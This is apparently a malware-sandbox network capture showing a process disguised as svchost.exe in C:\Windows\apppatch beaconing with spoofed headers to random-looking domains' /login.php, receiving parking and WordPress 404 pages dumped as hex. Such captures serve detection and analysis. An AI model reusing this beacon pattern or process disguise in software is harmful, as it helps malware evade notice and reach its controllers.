                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475147963 CEST1236INData Raw: 6e 22 0a 20 20 20 20 20 20 20 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 0a 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65
                                                                                                                                                                                                            Data Ascii: n" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-ms-text-size-adjust:100%;-webki
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475161076 CEST1236INData Raw: 6e 70 75 74 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c
                                                                                                                                                                                                            Data Ascii: nput{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=submit]{-webk1B4Eit-appearance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475171089 CEST1236INData Raw: 25 29 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 34 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63
                                                                                                                                                                                                            Data Ascii: %);text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buy
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475187063 CEST1236INData Raw: 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74
                                                                                                                                                                                                            Data Ascii: nline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.contain
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475200891 CEST1236INData Raw: 30 2c 32 30 30 2c 32 30 30 2c 2e 37 35 29 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 2d 6d 6f 7a 2d 74 72 61 6e 73
                                                                                                                                                                                                            Data Ascii: 0,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:i
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475239992 CEST1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65
                                                                                                                                                                                                            Data Ascii: background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#f
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475260973 CEST1236INData Raw: 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32
                                                                                                                                                                                                            Data Ascii: f}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:5%;padding-right:5%;padding-bottom:10px}.container-content{text-align:center;display:flex;position:relative;height:100%;max-width:1700px;margin:
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.475275993 CEST131INData Raw: 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                            Data Ascii: ontent--twot .container-content__left{background-position-y:top}.container-content--twot .container-content__right{background-pos
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.481081009 CEST1236INData Raw: 35 37 31 0d 0a 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 2d 2d 77 61 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69
                                                                                                                                                                                                            Data Ascii: 571ition-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            58192.168.2.454064199.59.243.226807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.874661922 CEST350OUTGET /login.php?subid1=20240908-1700-25db-aecf-35c2eeb9e276 HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: ww25.lyxynyx.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Cookie: __tad=1725778797.8172407
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.336908102 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Sun, 08 Sep 2024 07:00:25 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1226
                                                                                                                                                                                                            x-request-id: b34072de-3677-4c6c-928d-903add77e9d5
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bYWdJUqRq9NEDL5moINwz3Whi4u12YvTEYzpYN8UPX8ZHGkAZTtz/CMWVNn10ne7MOZtE6KLOou+dN8nLXIqmw==
                                                                                                                                                                                                            set-cookie: parking_session=b34072de-3677-4c6c-928d-903add77e9d5; expires=Sun, 08 Sep 2024 07:15:26 GMT; path=/
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 62 59 57 64 4a 55 71 52 71 39 4e 45 44 4c 35 6d 6f 49 4e 77 7a 33 57 68 69 34 75 31 32 59 76 54 45 59 7a 70 59 4e 38 55 50 58 38 5a 48 47 6b 41 5a 54 74 7a 2f 43 4d 57 56 4e 6e 31 30 6e 65 37 4d 4f 5a 74 45 36 4b 4c 4f 6f 75 2b 64 4e 38 6e 4c 58 49 71 6d 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_bYWdJUqRq9NEDL5moINwz3Whi4u12YvTEYzpYN8UPX8ZHGkAZTtz/CMWVNn10ne7MOZtE6KLOou+dN8nLXIqmw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                            Sep 8, 2024 09:00:26.336926937 CEST660INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                            Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjM0MDcyZGUtMzY3Ny00YzZjLTkyOGQtOTAzYWRkNzdlOWQ1IiwicGFnZV90aW1lIjoxNzI1Nzc4ODI2LCJwYWdlX3VybCI6I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            59192.168.2.45406572.52.179.174807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:27.750976086 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            60192.168.2.45406672.52.179.174807524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Sep 8, 2024 09:00:28.408338070 CEST243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyhub.com


                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            0192.168.2.455332188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 06:58:46 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC773INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93SruJii54aGJ3tSw%2F%2B4%2BmZDBr%2BiJZf3qVhxDobCgus%2Fou%2FJKuTnDSjN0AQRl%2FbzE34kN3Tn2DkcXSzJ%2BPqG79gHijB%2BQuA93KjA%2BOuXJdf6wWV8KunnqpMpUctJRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d51ae511881-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC596INData Raw: 37 63 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7cac<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC1369INData Raw: 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22
                                                                                                                                                                                                            Data Ascii: not found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id"
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC1369INData Raw: 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75
                                                                                                                                                                                                            Data Ascii: as.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));retu
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC1369INData Raw: 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73
                                                                                                                                                                                                            Data Ascii: aded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTes
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC1369INData Raw: 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e
                                                                                                                                                                                                            Data Ascii: ss-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-contain
                                                                                                                                                                                                            2024-09-08 06:58:47 UTC1369INData Raw: 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e
                                                                                                                                                                                                            Data Ascii: 00;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;lin


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.455335188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 06:58:48 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC763INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:58:49 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp2kWtSqF%2Bo7hDgUGx0qZqD5g954kf%2BoZSLMj20kPejZYURwmaDNDjH%2BxAhyQSDovRGE7dcN3bwFOdjn%2BdXSgOdisNiSNTIpPMuDpcckxgymIrjHZGxWk4MDZNE%2BBA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0d5b9d4143f9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC606INData Raw: 37 63 62 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7cb6<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-09-08 06:58:49 UTC1369INData Raw: 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                            Data Ascii: -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://
